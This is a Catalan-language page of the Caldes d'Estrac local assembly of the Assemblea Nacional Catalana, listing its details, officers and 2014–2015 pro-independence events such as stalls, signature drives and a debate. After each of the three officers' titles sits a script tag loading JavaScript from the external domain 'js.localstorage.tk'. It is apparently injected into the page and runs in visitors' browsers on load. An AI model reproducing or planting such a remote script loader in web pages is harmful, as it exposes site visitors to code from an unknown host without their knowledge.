Caldes d'Estrac per la Independència


Som l'assemblea territorial de l'ANC (Assemblea Nacional Catalana)

Dades de l'entitat

Nom
Caldes d'Estrac per la Independència
Adreça de correu electrònic
Àmbit
cultural
Quota
La quota, trimestral, és de 12€. Hi ha però, diferents modalitats que podeu consultar al web de l'ANC.
Data de constitució de l'entitat
29-01-2012
nif
CIF G65581621
Núm. registre d'entitat a la Generalitat
46548 - J / 1

Qui som

Teresa Barba
Coordinadora<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
Mercè Loire
Secretària<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
Mercè Artigas
Tresorera<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

SIGUES SOLIDARI I MOU-TE PER LA INDEPENDÈNCIA. DIVENDRES 14 D'AGOST AL PARC MARAGALL

L'ANC de Caldes organitza, en col·laboració amb Sige Sports i la Creu Roja, una masterclass de zumba, la presentació de la Via Lliure a la República Catalana de l'11 de setembre i una recollida solidària d'aliments, a partir de les 6 de la tarda al Parc Joan Maragall

Els caps de llista d'ERC i CiU de Caldes per a les eleccions municipals signen el full de compromís dels ajuntaments per la independència

Els caps de llista d’ERC i CiU de Caldes d'Estrac, Rosa Pou i Joaquim Arnó, respectivament, ja han signat el full de compromís dels ajuntaments per la independència dins de la campanya iniciada per l'Assemblea Nacional Catalana. En el cas d’ERC, la signatura es va fer en acabar l’acte de presentació de la seva candidatura a la Sala Cultural, el passat 26 d’abril, i en el cas de CiU, la signatura es va fer el dia 7 de maig al mateix Ajuntament.

Caldes d'Estrac per la Independència present a l'Assemblea General de l'ANC a Lleida

Avui, 12 d'abril de 2015, 9 membres de l'ANC de Caldes hem assistit a l'Assemblea General Ordinària de l'entitat a Lleida. El tret de sortida cap a les eleccions plebiscitàries del 27S ja està donat!

Com t'imagines una Catalunya independent? Vine i parlem-ne!

El divendres 20 de març, a les 19h a la Sala Cultural, a partir de la projecció de fragments del documental d'Isona Passola "L'endemà" (2014), farem un debat i intercanvi d'opinions sobre els temes que s'hi plantegen.
Amb la participació de membres de l'Assemblea Sectorial d'Economistes de l'ANC, i de les assemblees locals del Procés Constituent i de la Creu Roja

Diumenge 1 de juny, vine a l'esplanada de Can Muntanyà

Aquest diumenge 1 de juny, coincidint amb el Mercat de 2a mà, tornem a muntar la paradeta de l'ANC a l'esplanada de Can Muntanyà, amb el marxandatge habitual i recollida de signatures dins la campanya "Signa un vot per la independència". Us hi esperem!

Diumenge 18 de maig, vine a l'esplanada de Can Muntanyà!

Aquest diumenge 18 de maig 2014, d'11 a 14h, parada de l'ANC a l'esplanada de Can Muntanyà amb recollida de signatures dins la campanya "Signa un vot per la independència" i marxandatge habitual, coincidint amb la Fira de brocanters.

Dissabte 10 de maig, estelada humana a Mataró

A les 5 de la tarda, al Parc Central de Mataró es farà una estelada gegant, amb més de 2.000 persones. Encara us hi podeu inscriure!

Dissabte 10 de maig, eleccions al Secretariat Nacional de l'ANC

L'ANC de Caldes us convida a votar els representants al Secretariat Nacional, aquest dissabte a l'esplanada de Can Muntanyà, d'11 del matí a 2 del migdia.